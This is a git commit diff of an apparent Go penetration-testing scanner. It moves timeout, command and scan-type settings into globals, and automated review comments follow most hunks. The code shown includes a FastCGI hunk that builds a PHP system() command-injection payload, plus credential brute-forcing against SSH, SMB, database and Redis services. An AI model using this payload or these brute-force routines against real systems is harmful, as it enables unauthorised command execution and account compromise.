减少info结构体大小

影舞者 2022-07-03 23:41:39 +08:00
parent 8e1db5995e
commit b9b5eb9ce4
24 changed files with 119 additions and 122 deletions


@ -103,7 +103,7 @@ func SmbGhost(info *common.HostInfo) error {
}
func SmbGhostScan(info *common.HostInfo) error {
ip, port, timeout := info.Host, 445, time.Duration(info.Timeout)*time.Second
ip, port, timeout := info.Host, 445, time.Duration(common.Timeout)*time.Second
addr := fmt.Sprintf("%s:%v", info.Host, port)
conn, err := common.WrapperTcpWithTimeout("tcp", addr, timeout)
defer func() {


@ -56,7 +56,7 @@ func NetBIOS(info *common.HostInfo) error {
}
msg += fmt.Sprintf("[*] %-15s%-5s %s\\%-15s %s", info.Host, isdc, nbname.group, nbname.unique, nbname.osversion)
if info.Scantype == "netbios" {
if common.Scantype == "netbios" {
msg += "\n-------------------------------------------\n" + nbname.msg
}
if len(nbname.group) > 0 || len(nbname.unique) > 0 {
@ -75,16 +75,16 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
payload0 = append(payload0, []byte("\x00 EOENEBFACACACACACACACACACACACACA\x00")...)
}
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
defer func() {
if conn != nil{
if conn != nil {
conn.Close()
}
}()
if err != nil {
return
}
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err != nil {
return
}
@ -194,16 +194,16 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1}
realhost := fmt.Sprintf("%s:%v", info.Host, 137)
conn, err := net.DialTimeout("udp", realhost, time.Duration(info.Timeout)*time.Second)
conn, err := net.DialTimeout("udp", realhost, time.Duration(common.Timeout)*time.Second)
defer func() {
if conn != nil{
if conn != nil {
conn.Close()
}
}()
if err != nil {
return
}
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err != nil {
return
}


@ -23,17 +23,17 @@ func FcgiScan(info *common.HostInfo) {
return
}
url := "/etc/issue"
if info.Path != "" {
url = info.Path
if common.Path != "" {
url = common.Path
}
addr := fmt.Sprintf("%v:%v", info.Host, info.Ports)
var reqParams string
var cutLine = "-----ASDGTasdkk361363s-----\n"
switch {
case info.Command == "read":
case common.Command == "read":
reqParams = ""
case info.Command != "":
reqParams = "<?php system('" + info.Command + "');die('" + cutLine + "');?>"
case common.Command != "":
reqParams = "<?php system('" + common.Command + "');die('" + cutLine + "');?>"
default:
reqParams = "<?php system('whoami');die('" + cutLine + "');?>"
}
@ -54,7 +54,7 @@ func FcgiScan(info *common.HostInfo) {
env["REQUEST_METHOD"] = "GET"
}
fcgi, err := New(addr, info.Timeout)
fcgi, err := New(addr, common.Timeout)
defer func() {
if fcgi.rwc != nil {
fcgi.rwc.Close()
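Review bot: The deferred `fcgi.rwc.Close()` dereferences `fcgi` before the error from `New(addr, common.Timeout)` is checked; if `New` returns a nil pointer on failure (its body is not in this hunk), the defer panics on the first unreachable host — guard it with `if fcgi != nil && fcgi.rwc != nil {`. Separately, `common.Command` is spliced into a PHP single-quoted literal without escaping, so an operator command containing `'` or `\` breaks the payload; `cmd := strings.ReplaceAll(strings.ReplaceAll(common.Command, "\\", "\\\\"), "'", "\\'")` before building `reqParams` keeps the literal well-formed. FcgiScan starts and ends outside these hunks.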


@ -22,7 +22,7 @@ func Findnet(info *common.HostInfo) error {
func FindnetScan(info *common.HostInfo) error {
realhost := fmt.Sprintf("%s:%v", info.Host, 135)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
defer func() {
if conn != nil {
conn.Close()
@ -31,7 +31,7 @@ func FindnetScan(info *common.HostInfo) error {
if err != nil {
return err
}
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err != nil {
return err
}


@ -38,7 +38,7 @@ func FtpScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
@ -50,7 +50,7 @@ func FtpScan(info *common.HostInfo) (tmperr error) {
func FtpConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(info.Timeout)*time.Second)
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(common.Timeout)*time.Second)
if err == nil {
err = conn.Login(Username, Password)
if err == nil {


@ -9,14 +9,14 @@ import (
func MemcachedScan(info *common.HostInfo) (err error) {
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
defer func() {
if client != nil{
if client != nil {
client.Close()
}
}()
if err == nil {
err = client.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = client.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err == nil {
_, err = client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
if err == nil {


@ -12,7 +12,6 @@ func MongodbScan(info *common.HostInfo) error {
if common.IsBrute {
return nil
}
_, err := MongodbUnauth(info)
if err != nil {
errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err)
@ -25,7 +24,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
flag = false
senddata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
defer func() {
if conn != nil {
conn.Close()
@ -34,7 +33,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
if err != nil {
return flag, err
}
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err != nil {
return flag, err
}


@ -33,7 +33,7 @@ func MS17010(info *common.HostInfo) error {
func MS17010Scan(info *common.HostInfo) error {
ip := info.Host
// connecting to a host in LAN if reachable should be very quick
conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(info.Timeout)*time.Second)
conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(common.Timeout)*time.Second)
defer func() {
if conn != nil {
conn.Close()
@ -43,7 +43,7 @@ func MS17010Scan(info *common.HostInfo) error {
//fmt.Printf("failed to connect to %s\n", ip)
return err
}
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err != nil {
//fmt.Printf("failed to connect to %s\n", ip)
return err


@ -27,7 +27,7 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
@ -39,11 +39,11 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {
func MssqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(info.Timeout)*time.Second)
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(common.Timeout)*time.Second)
db, err := sql.Open("mssql", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
db.SetMaxIdleConns(0)
defer db.Close()
err = db.Ping()
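Review bot: The `dataSourceName` line still interpolates `Username` and `Password` raw into a `key=value;` string, so a candidate password containing `;` is silently truncated and the real value is never tried; building the URL form with `url.UserPassword(Username, Password)` lets the driver do the escaping. It is also worth confirming that the driver accepts a Go Duration string for `timeout=` (it renders as `3s` here); if it expects integer seconds, pass `common.Timeout` directly. Note that `encrypt=disable` sends the credentials in cleartext, acceptable for a scanner on a lab network but it should be a deliberate, commented choice. MssqlConn continues past the hunk.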


@ -27,7 +27,7 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
@ -39,11 +39,11 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {
func MysqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(info.Timeout)*time.Second)
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(common.Timeout)*time.Second)
db, err := sql.Open("mysql", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
db.SetMaxIdleConns(0)
defer db.Close()
err = db.Ping()
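Review bot: `dataSourceName` embeds `Username` and `Password` unescaped into the `user:pass@tcp(...)` DSN, so candidate passwords containing `@` or `/` can be mis-split by the driver's DSN parser and are never actually tried as typed. Since `sql.Open("mysql", …)` implies the go-sql-driver is already linked, `(&mysql.Config{User: Username, Passwd: Password, Net: "tcp", Addr: fmt.Sprintf("%v:%v", Host, Port), DBName: "mysql", Params: map[string]string{"charset": "utf8"}, Timeout: time.Duration(common.Timeout) * time.Second}).FormatDSN()` yields a correctly escaped DSN — assuming the driver is imported by name rather than blank-imported. MysqlConn continues past the hunk.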


@ -27,7 +27,7 @@ func OracleScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
@ -42,8 +42,8 @@ func OracleConn(info *common.HostInfo, user string, pass string) (flag bool, err
dataSourceName := fmt.Sprintf("oracle://%s:%s@%s:%s/orcl", Username, Password, Host, Port)
db, err := sql.Open("oracle", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
db.SetMaxIdleConns(0)
defer db.Close()
err = db.Ping()
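Review bot: Nothing in `OracleConn` bounds the connect itself: the hunk sets `SetConnMaxLifetime`/`SetConnMaxIdleTime` from `common.Timeout`, but those govern pooled-connection reuse, not how long `db.Ping()` may block dialing an unresponsive host, so the per-host budget checked in OracleScan can be blown by a single slow target. If the driver behind `sql.Open("oracle", …)` exposes a connect-timeout DSN option, set it from `common.Timeout`; otherwise use `db.PingContext(ctx)` with `ctx, cancel := context.WithTimeout(context.Background(), time.Duration(common.Timeout)*time.Second)`. The DSN also interpolates `Username`/`Password` without URL escaping — `url.UserPassword` handles that. OracleConn starts before this hunk.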


@ -27,7 +27,7 @@ func PostgresScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
@ -42,7 +42,7 @@ func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, e
dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable")
db, err := sql.Open("postgres", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
defer db.Close()
err = db.Ping()
if err == nil {
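Review bot: The `postgres://` DSN sets `sslmode=disable` but no connect timeout, so `db.Ping()` can block on an unresponsive host far longer than `common.Timeout`; `SetConnMaxLifetime` only affects pooled connections. If the driver is lib/pq, appending `&connect_timeout=%d` fed with `common.Timeout` to the format string bounds the dial; otherwise `db.PingContext` with a `context.WithTimeout` does the same. `Username`/`Password` are also interpolated without URL escaping, so a candidate password containing `@`, `/` or `#` is never tried as typed — `url.UserPassword(Username, Password).String()` fixes that. PostgresConn starts before this hunk.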


@ -48,7 +48,7 @@ func RdpScan(info *common.HostInfo) (tmperr error) {
for i := 0; i < common.BruteThread; i++ {
wg.Add(1)
go worker(info.Host, info.Domain, port, &wg, brlist, &signal, &num, all, &mutex, info.Timeout)
go worker(info.Host, common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, common.Timeout)
}
close(brlist)


@ -36,7 +36,7 @@ func RedisScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * common.Timeout) {
return err
}
}
@ -47,7 +47,7 @@ func RedisScan(info *common.HostInfo) (tmperr error) {
func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
flag = false
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
defer func() {
if conn != nil {
conn.Close()
@ -56,7 +56,7 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
if err != nil {
return flag, err
}
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err != nil {
return flag, err
}
@ -87,7 +87,7 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
flag = false
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
defer func() {
if conn != nil {
conn.Close()
@ -96,7 +96,7 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
if err != nil {
return flag, err
}
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err != nil {
return flag, err
}


@ -26,17 +26,17 @@ func Scan(info common.HostInfo) {
Hosts = CheckLive(Hosts, common.Ping)
fmt.Println("[*] Icmp alive hosts len is:", len(Hosts))
}
if info.Scantype == "icmp" {
if common.Scantype == "icmp" {
common.LogWG.Wait()
return
}
var AlivePorts []string
if info.Scantype == "webonly" {
if common.Scantype == "webonly" {
AlivePorts = NoPortScan(Hosts, info.Ports)
} else {
AlivePorts = PortScan(Hosts, info.Ports, info.Timeout)
AlivePorts = PortScan(Hosts, info.Ports, common.Timeout)
fmt.Println("[*] alive ports len is:", len(AlivePorts))
if info.Scantype == "portscan" {
if common.Scantype == "portscan" {
common.LogWG.Wait()
return
}
@ -49,7 +49,7 @@ func Scan(info common.HostInfo) {
fmt.Println("start vulscan")
for _, targetIP := range AlivePorts {
info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
if info.Scantype == "all" || info.Scantype == "main" {
if common.Scantype == "all" || common.Scantype == "main" {
switch {
case info.Ports == "135":
AddScan(info.Ports, info, ch, &wg) //findnet
@ -66,7 +66,7 @@ func Scan(info common.HostInfo) {
AddScan("1000003", info, ch, &wg) //webtitle
}
} else {
port, _ := common.PORTList[info.Scantype]
port, _ := common.PORTList[common.Scantype]
scantype := strconv.Itoa(port)
AddScan(scantype, info, ch, &wg)
}
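Review bot: `strings.Split(targetIP, ":")[0]` and `[1]` on the `info.Host, info.Ports` line mis-split any IPv6 target, yielding the first hextet as host and the wrong port; `net.SplitHostPort(targetIP)` handles both families. In the `else` branch, `port, _ := common.PORTList[common.Scantype]` drops the lookup result, so an unknown scan type silently becomes port "0" — this appears to rely on ParseScantype having already rejected it, which deserves a comment or an explicit `ok` check here so the function is safe on its own. Scan starts before these hunks and continues after them.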


@ -20,8 +20,8 @@ func SmbScan(info *common.HostInfo) (tmperr error) {
flag, err := doWithTimeOut(info, user, pass)
if flag == true && err == nil {
var result string
if info.Domain != "" {
result = fmt.Sprintf("[+] SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, info.Domain, user, pass)
if common.Domain != "" {
result = fmt.Sprintf("[+] SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, common.Domain, user, pass)
} else {
result = fmt.Sprintf("[+] SMB:%v:%v:%v %v", info.Host, info.Ports, user, pass)
}
@ -35,7 +35,7 @@ func SmbScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
@ -52,7 +52,7 @@ func SmblConn(info *common.HostInfo, user string, pass string, signal chan struc
Port: 445,
User: Username,
Password: Password,
Domain: info.Domain,
Domain: common.Domain,
Workstation: "",
}
@ -75,7 +75,7 @@ func doWithTimeOut(info *common.HostInfo, user string, pass string) (flag bool,
select {
case <-signal:
return flag, err
case <-time.After(time.Duration(info.Timeout) * time.Second):
case <-time.After(time.Duration(common.Timeout) * time.Second):
return false, errors.New("time out")
}
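Review bot: In `doWithTimeOut`, when the `time.After(common.Timeout)` branch wins, the goroutine feeding `signal` keeps running and nothing on this path closes the SMB session it may still establish; if `signal` is unbuffered, that goroutine then blocks on its send forever. Making `signal` a buffered channel of size 1 (or having the sender `select` on a cancel channel) avoids the leak; the goroutine is started outside this hunk, so that is where the change belongs. The success line in SmbScan also logs the cleartext password, which is expected for a scanner but worth remembering for any saved output. SmblConn and doWithTimeOut both begin before their hunks.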
}


@ -29,11 +29,11 @@ func SshScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ssh"])*len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ssh"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
if info.SshKey != "" {
if common.SshKey != "" {
return err
}
}
@ -45,8 +45,8 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass
Auth := []ssh.AuthMethod{}
if info.SshKey != "" {
pemBytes, err := ioutil.ReadFile(info.SshKey)
if common.SshKey != "" {
pemBytes, err := ioutil.ReadFile(common.SshKey)
if err != nil {
return false, errors.New("read key failed" + err.Error())
}
@ -62,7 +62,7 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
config := &ssh.ClientConfig{
User: Username,
Auth: Auth,
Timeout: time.Duration(info.Timeout) * time.Second,
Timeout: time.Duration(common.Timeout) * time.Second,
HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
return nil
},
@ -76,16 +76,16 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
defer session.Close()
flag = true
var result string
if info.Command != "" {
combo, _ := session.CombinedOutput(info.Command)
if common.Command != "" {
combo, _ := session.CombinedOutput(common.Command)
result = fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
if info.SshKey != "" {
if common.SshKey != "" {
result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct \n %v", Host, Port, string(combo))
}
common.LogSuccess(result)
} else {
result = fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password)
if info.SshKey != "" {
if common.SshKey != "" {
result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct", Host, Port)
}
common.LogSuccess(result)
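Review bot: The `HostKeyCallback` in `SshConn` returns nil unconditionally, disabling host-key verification; that is the intended trade-off for a scanner, but `HostKeyCallback: ssh.InsecureIgnoreHostKey(),` states it explicitly and is what reviewers grep for. The key file is also re-read with `ioutil.ReadFile(common.SshKey)` on every SshConn call, i.e. once per user/password pair, although `common.SshKey` is fixed for the whole run — reading it once (a `sync.Once`, or in SshScan before the loop) avoids the repeated disk reads and repeated parse failures. Minor: `"read key failed" + err.Error()` runs the message into the error text; `fmt.Errorf("read key %s: %w", common.SshKey, err)` is clearer. SshConn starts before this hunk.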


@ -38,13 +38,13 @@ func GOWebTitle(info *common.HostInfo) (err error, CheckData []WebScan.CheckData
info.Url = fmt.Sprintf("https://%s", info.Host)
default:
host := fmt.Sprintf("%s:%s", info.Host, info.Ports)
protocol := GetProtocol(host, info.Timeout)
protocol := GetProtocol(host, common.Timeout)
info.Url = fmt.Sprintf("%s://%s:%s", protocol, info.Host, info.Ports)
}
} else {
if !strings.Contains(info.Url, "://") {
host := strings.Split(info.Url, "/")[0]
protocol := GetProtocol(host, info.Timeout)
protocol := GetProtocol(host, common.Timeout)
info.Url = fmt.Sprintf("%s://%s", protocol, info.Url)
}
}


@ -77,6 +77,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
return false, err, ""
}
variableMap := make(map[string]interface{})
defer func() { variableMap = nil }()
variableMap["request"] = req
for _, item := range p.Set {
k, expression := item.Key, item.Value
@ -123,7 +124,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
req.Url.Path = rule.Path
}
// 某些poc没有区分path和query需要处理
//req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
//req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
newRequest, err := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, string([]rune(req.Url.Path))), strings.NewReader(rule.Body))
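Review bot: The added `defer func() { variableMap = nil }()` has no effect: `variableMap` is a local, so it becomes unreachable when `executePoc` returns anyway, and the line only adds a deferred closure for nothing — drop it. Re-enabling `req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")` encodes spaces only; every other character that the following `fmt.Sprintf("%s://%s%s", …)` puts into the request URL stays unescaped, which may be deliberate given the preceding comment that some POCs do not separate path and query — a comment stating that constraint (e.g. `// only spaces are encoded: POC paths may legitimately carry '?' and '#'`) would spare the next maintainer from "fixing" it with url.PathEscape. executePoc starts before these hunks and continues after them.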


@ -23,7 +23,7 @@ var (
func Inithttp(PocInfo common.PocInfo) {
//PocInfo.Proxy = "http://127.0.0.1:8080"
err := InitHttpClient(PocInfo.Num, PocInfo.Proxy, time.Duration(PocInfo.Timeout)*time.Second)
err := InitHttpClient(PocInfo.Num, common.Proxy, time.Duration(common.WebTimeout)*time.Second)
if err != nil {
log.Fatal(err)
}
@ -57,7 +57,7 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
} else {
return errors.New("Failed type assertion to DialContext")
}
}else if DownProxy != "" {
} else if DownProxy != "" {
if DownProxy == "1" {
DownProxy = "http://127.0.0.1:8080"
} else if DownProxy == "2" {
@ -65,7 +65,7 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
} else if !strings.Contains(DownProxy, "://") {
DownProxy = "http://127.0.0.1:" + DownProxy
}
if !strings.HasPrefix(DownProxy,"socks") && !strings.HasPrefix(DownProxy,"http") {
if !strings.HasPrefix(DownProxy, "socks") && !strings.HasPrefix(DownProxy, "http") {
return errors.New("no support this proxy")
}
u, err := url.Parse(DownProxy)
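Review bot: The comment `//PocInfo.Proxy = "http://127.0.0.1:8080"` above the `InitHttpClient` call is now stale, since this commit removes `Proxy` from `PocInfo` and the call reads `common.Proxy` instead; change it to `//common.Proxy = "http://127.0.0.1:8080"` or delete it. The `DownProxy == "1"` / `"2"` shortcuts in InitHttpClient are undocumented magic values — a one-line comment beside them (and a mention in the `-proxy` help text) would make the behaviour discoverable. InitHttpClient continues past the hunk.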


@ -599,13 +599,13 @@ func DoRequest(req *http.Request, redirect bool) (*Response, error) {
oResp, err = ClientNoRedirect.Do(req)
}
if err != nil {
fmt.Println(err)
//fmt.Println("[-]DoRequest error: ",err)
return nil, err
}
defer oResp.Body.Close()
resp, err := ParseResponse(oResp)
if err != nil {
fmt.Println(err)
fmt.Println("[-]ParseResponse error: ", err)
return nil, err
}
return resp, err
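Review bot: Error handling in `DoRequest` is now inconsistent: the `ClientNoRedirect.Do` failure is returned silently (its print commented out) while the `ParseResponse` failure is both printed to stdout via `fmt.Println` and returned, so a caller that logs the error reports it twice. Handle it at one layer — either drop the remaining `fmt.Println("[-]ParseResponse error: ", err)` and let the caller report, or route both failures through the package's logging helper instead of stdout. DoRequest starts before this hunk.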


@ -12,19 +12,19 @@ import (
)
func Parse(Info *HostInfo) {
ParseUser(Info)
ParseUser()
ParsePass(Info)
ParseInput(Info)
ParseScantype(Info)
}
func ParseUser(Info *HostInfo) {
if Info.Username == "" && Userfile == "" {
func ParseUser() {
if Username == "" && Userfile == "" {
return
}
if Info.Username != "" {
Info.Usernames = strings.Split(Info.Username, ",")
var Usernames []string
if Username != "" {
Usernames = strings.Split(Username, ",")
}
if Userfile != "" {
@ -32,37 +32,38 @@ func ParseUser(Info *HostInfo) {
if err == nil {
for _, user := range users {
if user != "" {
Info.Usernames = append(Info.Usernames, user)
Usernames = append(Usernames, user)
}
}
}
}
Info.Usernames = RemoveDuplicate(Info.Usernames)
Usernames = RemoveDuplicate(Usernames)
for name := range Userdict {
Userdict[name] = Info.Usernames
Userdict[name] = Usernames
}
}
func ParsePass(Info *HostInfo) {
if Info.Password != "" {
passs := strings.Split(Info.Password, ",")
var PwdList []string
if Password != "" {
passs := strings.Split(Password, ",")
for _, pass := range passs {
if pass != "" {
Info.Passwords = append(Info.Passwords, pass)
PwdList = append(PwdList, pass)
}
}
Passwords = Info.Passwords
Passwords = PwdList
}
if Passfile != "" {
passs, err := Readfile(Passfile)
if err == nil {
for _, pass := range passs {
if pass != "" {
Info.Passwords = append(Info.Passwords, pass)
PwdList = append(PwdList, pass)
}
}
Passwords = Info.Passwords
Passwords = PwdList
}
}
if UrlFile != "" {
@ -149,7 +150,7 @@ func ParseInput(Info *HostInfo) {
if UserAdd != "" {
user := strings.Split(UserAdd, ",")
for a, _ := range Userdict {
for a := range Userdict {
Userdict[a] = append(Userdict[a], user...)
Userdict[a] = RemoveDuplicate(Userdict[a])
}
@ -166,12 +167,12 @@ func ParseInput(Info *HostInfo) {
}
func ParseScantype(Info *HostInfo) {
_, ok := PORTList[Info.Scantype]
_, ok := PORTList[Scantype]
if !ok {
showmode()
}
if Info.Scantype != "all" && Info.Ports == DefaultPorts+","+Webport {
switch Info.Scantype {
if Scantype != "all" && Info.Ports == DefaultPorts+","+Webport {
switch Scantype {
case "rdp":
Info.Ports = "3389"
case "web":
@ -187,10 +188,10 @@ func ParseScantype(Info *HostInfo) {
case "main":
Info.Ports = DefaultPorts
default:
port, _ := PORTList[Info.Scantype]
port, _ := PORTList[Scantype]
Info.Ports = strconv.Itoa(port)
}
